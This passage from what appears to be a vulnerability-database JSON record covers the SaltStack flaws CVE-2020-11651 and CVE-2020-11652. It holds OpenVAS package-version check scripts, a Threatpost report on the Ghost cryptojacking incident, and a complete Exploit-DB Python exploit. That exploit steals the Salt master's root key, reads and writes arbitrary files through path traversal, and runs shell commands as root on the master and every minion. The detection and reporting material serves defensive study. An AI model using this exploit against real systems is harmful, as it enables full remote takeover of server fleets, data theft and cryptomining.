"cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/saltstack_salt_root_key.rb"}], "openvas": [{"lastseen": "2020-05-12T15:13:45", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-05-11T00:00:00", "published": "2020-05-01T00:00:00", "id": "OPENVAS:1361412562310853131", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310853131", "title": "openSUSE: Security Advisory for salt (openSUSE-SU-2020:0564-1)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.853131\");\n script_version(\"2020-05-11T07:05:27+0000\");\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-11 07:05:27 +0000 (Mon, 11 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-01 03:01:53 +0000 (Fri, 01 May 2020)\");\n script_name(\"openSUSE: Security Advisory for salt (openSUSE-SU-2020:0564-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2020:0564-1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'salt'\n package(s) announced via the openSUSE-SU-2020:0564-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for salt fixes the following issues:\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-564=1\");\n\n script_tag(name:\"affected\", value:\"'salt' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"python2-salt\", rpm:\"python2-salt~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python3-salt\", rpm:\"python3-salt~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt\", rpm:\"salt~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-api\", rpm:\"salt-api~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-cloud\", rpm:\"salt-cloud~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-doc\", rpm:\"salt-doc~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-master\", rpm:\"salt-master~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-minion\", rpm:\"salt-minion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-proxy\", rpm:\"salt-proxy~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-ssh\", rpm:\"salt-ssh~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-standalone-formulas-configuration\", rpm:\"salt-standalone-formulas-configuration~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-syndic\", rpm:\"salt-syndic~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-bash-completion\", rpm:\"salt-bash-completion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-fish-completion\", rpm:\"salt-fish-completion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-zsh-completion\", rpm:\"salt-zsh-completion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T17:13:00", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-05-07T00:00:00", "published": "2020-05-07T00:00:00", "id": "OPENVAS:1361412562310704676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704676", "title": "Debian: Security Advisory for salt (DSA-4676-1)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704676\");\n script_version(\"2020-05-07T03:00:32+0000\");\n script_cve_id(\"CVE-2019-17361\", \"CVE-2020-11651\", \"CVE-2020-11652\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-07 03:00:32 +0000 (Thu, 07 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-07 03:00:32 +0000 (Thu, 07 May 2020)\");\n script_name(\"Debian: Security Advisory for salt (DSA-4676-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|10)\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2020/dsa-4676.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4676-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'salt'\n package(s) announced via the DSA-4676-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\");\n\n script_tag(name:\"affected\", value:\"'salt' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\nWe recommend that you upgrade your salt packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"salt-api\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-cloud\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-common\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-doc\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-master\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-minion\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-proxy\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-ssh\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-syndic\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-api\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-cloud\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-common\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-doc\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-master\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-minion\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-proxy\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-ssh\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-syndic\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2020-05-05T21:39:19", "bulletinFamily": "exploit", "description": "", "modified": "2020-05-05T00:00:00", "published": "2020-05-05T00:00:00", "id": "EDB-ID:48421", "href": "https://www.exploit-db.com/exploits/48421", "type": "exploitdb", "title": "Saltstack 3000.1 - Remote Code Execution", "sourceData": "# Exploit Title: Saltstack 3000.1 - Remote Code Execution\r\n# Date: 2020-05-04\r\n# Exploit Author: Jasper Lievisse Adriaanse\r\n# Vendor Homepage: https://www.saltstack.com/\r\n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*\r\n# Tested on: Debian 10 with Salt 2019.2.0\r\n# CVE : CVE-2020-11651 and CVE-2020-11652\r\n# Discription: Saltstack authentication bypass/remote code execution\r\n#\r\n# Source: https://github.com/jasperla/CVE-2020-11651-poc\r\n# This exploit is based on this checker script:\r\n# https://github.com/rossengeorgiev/salt-security-backports\r\n\r\n#!/usr/bin/env python\r\n#\r\n# Exploit for CVE-2020-11651 and CVE-2020-11652\r\n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)\r\n# This exploit is based on this checker script:\r\n# https://github.com/rossengeorgiev/salt-security-backports\r\n\r\nfrom __future__ import absolute_import, print_function, unicode_literals\r\nimport argparse\r\nimport datetime\r\nimport os\r\nimport os.path\r\nimport sys\r\nimport time\r\n\r\nimport salt\r\nimport salt.version\r\nimport salt.transport.client\r\nimport salt.exceptions\r\n\r\ndef init_minion(master_ip, master_port):\r\n minion_config = {\r\n 'transport': 'zeromq',\r\n 'pki_dir': '/tmp',\r\n 'id': 'root',\r\n 'log_level': 'debug',\r\n 'master_ip': master_ip,\r\n 'master_port': master_port,\r\n 'auth_timeout': 5,\r\n 'auth_tries': 1,\r\n 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)\r\n }\r\n\r\n return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')\r\n\r\n# --- check funcs ----\r\n\r\ndef check_salt_version():\r\n print(\"[+] Salt version: {}\".format(salt.version.__version__))\r\n\r\n vi = salt.version.__version_info__\r\n\r\n if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):\r\n return True\r\n else:\r\n return False\r\n\r\ndef check_connection(master_ip, master_port, channel):\r\n print(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='')\r\n sys.stdout.flush()\r\n\r\n # connection check\r\n try:\r\n channel.send({'cmd':'ping'}, timeout=2)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"OFFLINE\")\r\n sys.exit(1)\r\n else:\r\n print(\"ONLINE\")\r\n\r\ndef check_CVE_2020_11651(channel):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11651... \", end='')\r\n sys.stdout.flush()\r\n # try to evil\r\n try:\r\n rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"YES\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n pass\r\n finally:\r\n if rets:\r\n root_key = rets[2]['root']\r\n return root_key\r\n\r\n return None\r\n\r\ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'cmd': 'get_token',\r\n 'arg': [],\r\n 'token': top_secret_file_path,\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"YES\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n print(\"NO\")\r\n \r\ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.read',\r\n 'path': top_secret_file_path,\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n if rets['data']['return']:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_write1(debug, channel, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.write',\r\n 'path': '../../../../../../../../tmp/salt_CVE_2020_11652',\r\n 'data': 'evil',\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n\r\n pp(rets)\r\n if rets['data']['return'].startswith('Wrote'):\r\n try:\r\n os.remove('/tmp/salt_CVE_2020_11652')\r\n except OSError:\r\n print(\"Maybe?\")\r\n else:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_write2(debug, channel, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'config.update_config',\r\n 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',\r\n 'yaml_contents': 'evil',\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n if rets['data']['return'].startswith('Wrote'):\r\n try:\r\n os.remove('/tmp/salt_CVE_2020_11652.conf')\r\n except OSError:\r\n print(\"Maybe?\")\r\n else:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef pwn_read_file(channel, root_key, path, master_ip):\r\n print(\"[+] Attemping to read {} from {}\".format(path, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.read',\r\n 'path': path,\r\n 'saltenv': 'base',\r\n }\r\n\r\n rets = channel.send(msg, timeout=3)\r\n print(rets['data']['return'][0][path])\r\n\r\ndef pwn_upload_file(channel, root_key, src, dest, master_ip):\r\n print(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip))\r\n sys.stdout.flush()\r\n\r\n try:\r\n fh = open(src, 'rb')\r\n payload = fh.read()\r\n fh.close()\r\n except Exception as e:\r\n print('[-] Failed to read {}: {}'.format(src, e))\r\n return\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.write',\r\n 'saltenv': 'base',\r\n 'data': payload,\r\n 'path': dest,\r\n }\r\n\r\n rets = channel.send(msg, timeout=3)\r\n print('[ ] {}'.format(rets['data']['return']))\r\n\r\ndef pwn_exec(channel, root_key, cmd, master_ip, jid):\r\n print(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'runner',\r\n 'fun': 'salt.cmd',\r\n 'saltenv': 'base',\r\n 'user': 'sudo_user',\r\n 'kwarg': {\r\n 'fun': 'cmd.exec_code',\r\n 'lang': 'python',\r\n 'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd)\r\n },\r\n 'jid': jid,\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except Exception as e:\r\n print('[-] Failed to submit job')\r\n return\r\n\r\n if rets.get('jid'):\r\n print('[+] Successfully scheduled job: {}'.format(rets['jid']))\r\n\r\ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid):\r\n print(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': '_send_pub',\r\n 'fun': 'cmd.run',\r\n 'user': 'root',\r\n 'arg': [ \"/bin/sh -c '{}'\".format(cmd) ],\r\n 'tgt': '*',\r\n 'tgt_type': 'glob',\r\n 'ret': '',\r\n 'jid': jid\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except Exception as e:\r\n print('[-] Failed to submit job')\r\n return\r\n finally:\r\n if rets == None:\r\n print('[+] Successfully submitted job to all minions.')\r\n else:\r\n print('[-] Failed to submit job')\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')\r\n parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')\r\n parser.add_argument('--port', '-p', dest='master_port', default='4506')\r\n parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')\r\n parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')\r\n parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')\r\n parser.add_argument('--read', '-r', dest='read_file')\r\n parser.add_argument('--upload-src', dest='upload_src')\r\n parser.add_argument('--upload-dest', dest='upload_dest')\r\n parser.add_argument('--exec', dest='exec', help='Run a command on the master')\r\n parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')\r\n args = parser.parse_args()\r\n\r\n print(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\")\r\n time.sleep(1)\r\n\r\n # Both src and destination are required for uploads\r\n if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):\r\n print('[-] Must provide both --upload-src and --upload-dest')\r\n sys.exit(1)\r\n\r\n channel = init_minion(args.master_ip, args.master_port)\r\n\r\n if check_salt_version():\r\n print(\"[ ] This version of salt is vulnerable! Check results below\")\r\n elif args.force:\r\n print(\"[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.\")\r\n else:\r\n sys.exit()\r\n\r\n check_connection(args.master_ip, args.master_port, channel)\r\n \r\n root_key = check_CVE_2020_11651(channel)\r\n if root_key:\r\n print('\\n[*] root key obtained: {}'.format(root_key))\r\n else:\r\n print('[-] Failed to find root key...aborting')\r\n sys.exit(127)\r\n\r\n if args.run_checks:\r\n # Assuming this check runs on the master itself, create a file with \"secret\" content\r\n # and abuse CVE-2020-11652 to read it.\r\n top_secret_file_path = '/tmp/salt_cve_teta'\r\n with salt.utils.fopen(top_secret_file_path, 'w') as fd:\r\n fd.write(\"top secret\")\r\n\r\n # Again, this assumes we're running this check on the master itself\r\n with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:\r\n root_key = keyfd.read()\r\n\r\n check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)\r\n check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)\r\n check_CVE_2020_11652_write1(debug, channel, root_key)\r\n check_CVE_2020_11652_write2(debug, channel, root_key)\r\n os.remove(top_secret_file_path)\r\n sys.exit(0)\r\n\r\n if args.read_file:\r\n pwn_read_file(channel, root_key, args.read_file, args.master_ip)\r\n\r\n if args.upload_src:\r\n if os.path.isabs(args.upload_dest):\r\n print('[-] Destination path must be relative; aborting')\r\n sys.exit(1)\r\n pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)\r\n\r\n\r\n jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())\r\n\r\n if args.exec:\r\n pwn_exec(channel, root_key, args.exec, args.master_ip, jid)\r\n\r\n if args.exec_all:\r\n print(\"[!] Lester, is this what you want? Hit ^C to abort.\")\r\n time.sleep(2)\r\n pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/48421"}], "threatpost": [{"lastseen": "2020-05-12T21:39:31", "bulletinFamily": "info", "description": "Hackers targeted the publishing platform Ghost over the weekend, launching a cryptojacking attack against its servers that led to widespread outages. The attack stemmed from the exploit of critical [vulnerabilities in ](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>)[SaltStack](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>), used in Ghost\u2019s server management infrastructure.\n\nGhost is a free, open-source blogging platform with an install base of over 2 million, including big-name customers like Mozilla and DuckDuckGo. The company, which touts itself as an alternative to platforms like WordPress, Medium and Tumblr, first posted on Sunday at 3:24 BST that customers were experiencing service outages. It has since fixed the issue and systems are up and running again, as of Monday.\n\nUpon further investigation, Ghost said that the hack stemmed from attackers exploiting two flaws, [CVE-2020-11651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11651>) and[ CVE-2020-11652](<https://nvd.nist.gov/vuln/detail/CVE-2020-11652>), which allow full remote code execution as root on servers in data centers and cloud environments. The two flaws specifically exist in SaltStack\u2019s open-source Salt management framework, used by customers like Ghost as an [open-source configuration tool](<https://github.com/saltstack/salt>) to monitor and update the state of their servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAll traces of the crypto-mining virus were successfully eliminated yesterday, all systems remain stable, and we have not discovered any further concerns or issues on our network,\u201d according to Ghost\u2019s [announcement](<https://status.ghost.org/>) on its status update page. \u201cThe team is now working hard on remediation to clean and rebuild our entire network. We will keep this incident open and continue to share updates until it is fully resolved. We will also be contacting all customers directly to notify them of the incident, and publishing a public post-mortem later this week.\u201d\n\nCVE-2020-11651 is an authentication bypass issue, while CVE-2020-11652 is a directory-traversal flaw where untrusted input (i.e. parameters in network requests) is not sanitized correctly. This in turn allows access to the entire filesystem of the master server, researchers found.\n\nSaltStack has released patches for the flaw in [release 3000.2](<https://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html>), on April 30 \u2013 however, researchers with F-Secure, who discovered the flaw, said a preliminary scan revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet. As such, researchers warned that they expect in-the-wild attacks to be launched against the flaws imminently.\n\nIt appears that some of those vulnerable Salt instances belonged to Ghost. After exploiting the flaws, attackers were able launch a cryptocurrency mining attack, which in turn spiked CPU usage and overloaded systems. Both Ghost Pro sites and Ghost.org billing services were affected \u2013 though Ghost said that credit card data was not affected. Ghost said that a fix has been implemented and that additional firewall configurations are now running.\n\n\u201cAt this time there is no evidence of any attempts to access any of our systems or data,\u201d according to Ghost. \u201cNevertheless, all sessions, passwords and keys are being cycled and all servers are being re-provisioned.\u201d\n\nAlex Peay, senior vice president of Product at SaltStack, told Threatpost that \u201cupon notification of the CVE, SaltStack took immediate action to remediate the vulnerability, develop and issue patches, and communicate to our customers about the affected versions so they can prepare their systems for update.\u201d\n\n\u201cWe must reinforce how critical it is that all Salt users patch their systems and follow the guidance we have provided outlining steps for remediation and best practices for Salt environment security,\u201d Peay said. \u201cIt is equally important to upgrade to latest versions of the platform and register with support for future awareness of any possible issues and remediations.\u201d\n\nThreatpost has reached out to Ghost for further comment.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "modified": "2020-05-04T19:23:41", "published": "2020-05-04T19:23:41", "id": "THREATPOST:A1F6C89E2D2F2205B93C6727C24B908C", "href": "https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/", "type": "threatpost", 